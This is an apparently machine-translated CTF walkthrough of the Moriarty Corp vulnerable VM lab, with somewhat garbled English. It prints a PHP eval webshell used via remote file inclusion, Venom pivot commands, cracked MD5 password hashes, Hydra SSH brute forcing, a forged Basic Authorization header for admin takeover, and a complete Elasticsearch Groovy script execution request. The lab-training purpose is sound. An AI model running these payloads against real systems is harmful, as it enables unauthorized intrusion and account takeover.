Main knowledge points investigated
The file contains Intranet penetration command upload weak password change permission HTTP Header ElasticSearch-CVE Brute force crackingCopy the code
Network topology
After writing, I also did the network topology of the target machine
Written in the book before
The VIRTUAL machine used this time is VM_VirtualBox. I used it for the first time and configured it for a long time. Because the target machine is an internal network environment, some network configurations need to be manually adjusted
The network configuration is set as above, and the IP can be scanned again. According to the MAC address, the IP of our target plane can be found.
Target machine download address:
BoredHackerBlog: Moriarty Corp
Infiltration process
IP found
The Windows environment is used for penetration testing, and Advanced_IP_Scanner is used for Intranet IP scanning
Discover IP addresses based on MAC addresses and perform port scanning for the obtained IP addresses
Port scanning
Here we use the imperial Sword port scanner for detection
Port 8000 and port 9000 are found to be suspicious, and WEB access is performed
WEB penetration
Accessing port 8000
Is a page for submitting flag, which also shows our task progress. First, submit the first flag according to the prompts
Display the new prompt again
Combined with the powerful Baidu Translate and Google Translate, it seems to be clear that let’s start infiltrating from port 80, then submit flag here, and access port 80 again at this time
Access is now clear, and our infiltration process is officially underway
Suspected file inclusion vulnerability was found according to the URL. Try to read sensitive data
After successfully reading the /etc/passwd file, let’s construct to see if webshell can be included remotely
The webshell is first constructed on the local server
<? php eval($_REQUEST['pdsdt']); echo 'Welcome Hacker'; phpinfo(); ? >Copy the code
Try remote file include
Successfully included the remote file, using the ant sword to link the Webshell
Look for information on flags and next steps
The flag file was found in the root directory. Procedure
Submit on page 8000 and give us a hint again after submission
The next step is to forward traffic to infiltrate the Intranet. The next step is to forward traffic to infiltrate the Intranet
Intranet penetration – Set the proxy
Set the Intranet proxy. There are many ways to set the Intranet proxy. You can also use MSF for the whole test because Venom&proxifier is used to forward traffic for convenience
Upload the agent node first
Start the Admin program listener on Windows
admin.exe -lport 9999
Copy the code
On the Agent, change the program permission to 777 and run the following command
/agent_linux_x64 -rhost 192.168.1.101 -rport 9999Copy the code
Data is successfully monitored
Example Set the SOck5 proxy
Set the proxifier
Attempt Intranet access to the target
Successful visit
The next step is to conduct specific Intranet roaming
First of all, obtain the target aircraft surviving on the Intranet and scan it according to the network segment prompted by the question
A web page for target 172.17.0.4 is found
It was found to be a file upload point, and we need to input the password to upload successfully. First, burp capture the packet, and run the common weak password
Caught the package, try fuzz password
When weak password password is tried, successful upload is displayed…
According to the feedback page, try visiting our Webshell
Code execution success, successful upload, ant sword connection
Find a Flag file again and try to submit it on page 8000
Again, the page gives a hint
We were given a user name and an encrypted password to try SSH login after cracking the hashed password
username:
root
toor
admin
mcorp
moriarty
Copy the code
password:
63a9f0ea7bb98050796b649e85481845
7b24afc8bc80e548d66c4e7ff72171c5
5f4dcc3b5aa765d61d8327deb882cf99
21232f297a57a5a743894a0e4a801fc3
084e0343a0486ff05530df6c705c8bb4
697c6cc76fdbde5baccb7b3400391e30
8839cfc8a0f24eb155ae3f7f205f5cbc
35ac704fe1cc7807c914af478f20fd35
b27a803ed346fbbf6d2e2eb88df1c51b
08552d48aa6d6d9c05dd67f1b4ba8747
Copy the code
Cmd5 = somD5 = somD5 = somD5 = somD5 = somD5
Hash value | clear |
---|---|
63a9f0ea7bb98050796b649e85481845 | root |
7b24afc8bc80e548d66c4e7ff72171c5 | toor |
5f4dcc3b5aa765d61d8327deb882cf99 | password |
21232f297a57a5a743894a0e4a801fc3 | admin |
084e0343a0486ff05530df6c705c8bb4 | guest |
697c6cc76fdbde5baccb7b3400391e30 | MORIARTY |
8839cfc8a0f24eb155ae3f7f205f5cbc | MCORP |
35ac704fe1cc7807c914af478f20fd35 | mcorp |
b27a803ed346fbbf6d2e2eb88df1c51b | weapons |
08552d48aa6d6d9c05dd67f1b4ba8747 | moriarty |
Scan the machine with port 22 on the Intranet again
It was found that SSH port 172.17.0.5 was open. According to the obtained information, a dictionary was constructed and the SSH blasting tool was used for blasting (finally, the successful blasting was carried out using Hydra).
The obtained password is:
root / weapons
Copy the code
Log in using Xshell
Flag is obtained again
We submitted on port 8000 to update the hint again
There is also a chat program on the Intranet, and the port is not 80. Let’s scan the specified ports. At the same time, an account is given, and let’s get the records of the administrator user
Port 8000 on 172.17.0.6 is open
Prompt we need to login, according to the prompt to our account login
Here are the credentials our agent has obtained from another source:
username: buyer13
password: arms13
Copy the code
Log in successfully
Discover the site has two functions, check chat history, change password, try to visit the change password page, grab the package, see if there is any user password reset
Example Change the user name to admin
The packet is scanned and a problem is found in the header
Authorization: Basic YnV5ZXIxMzphcm1zMTM=
Copy the code
To decrypt the
With the name and password of the user, let’s try to construct the identity of the administrator and change the password to admin
Authorization: Basic YWRtaW46YWRtaW4=
Copy the code
Go back to the Web page, log in again, or change the header access
Successfully logged in to user admin to access chats
Get the flag again and submit
I looked along while, this is not ES, recently do the project is using things, is really qiaoer his mother to qiaoer open the door, Qiaoer home, scan a network segment 9200 port
Go to the page, the standard ES search page
Try ES’s arbitrary code execution vulnerability
Construct a packet to create a piece of data
POST /mitian/ Mitian6 / HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 19 Pragma: no-cache cache-control: No-cache upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 the content-type: text/plain Accept: text/HTML and application/XHTML + XML, application/XML. Q = 0.9, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q = 0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept - Encoding: gzip, deflate the Accept - Language: useful - CN, useful; Q =0.9 Connection: close {"name": "PDSDT "}Copy the code
The search page is then constructed
POST /_search? Pretty HTTP/1.1 Host: 172.17.0.7:9200 Content-Length: 156 Pragma: no-cache cache-control: No-cache upgrade-insecure -Requests: 1 User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; X64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36 Origin: http://172.17.0.7:9200 the content-type: text/plain Accept: text/HTML and application/XHTML + XML, application/XML. Q = 0.9, image/webp image/apng, * / *; Q = 0.8, application/signed - exchange; v=b3; Q = 0.9 Referer: http://172.17.0.7:9200/mitian/mitian6/ Accept - Encoding: gzip, deflate the Accept - Language: useful - CN, useful; Q =0.9 Connection: close {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("ls").getText()"}}}Copy the code
Execute command successfully, read the flag
The flag file is successfully obtained and submitted
Show the mission completed, and added our IP to the blacklist, really kick ass
conclusion
The drone spent most of my time, main or adjusting at the top of the network configuration, network the drone of each is not too difficult, how important is through the use of forward the flow after the correct tools to achieve the purpose of scanning port blasting service, the overall results are high, while it is true and real environment in which difference is bigger, However, RECENTLY I was using ES products, and I also took this opportunity to strengthen my learning of ES related vulnerabilities.
The problem
Do you have any friends who want to learn network security but don’t know how to start?
I sorted out most of the learning materials here, there is no need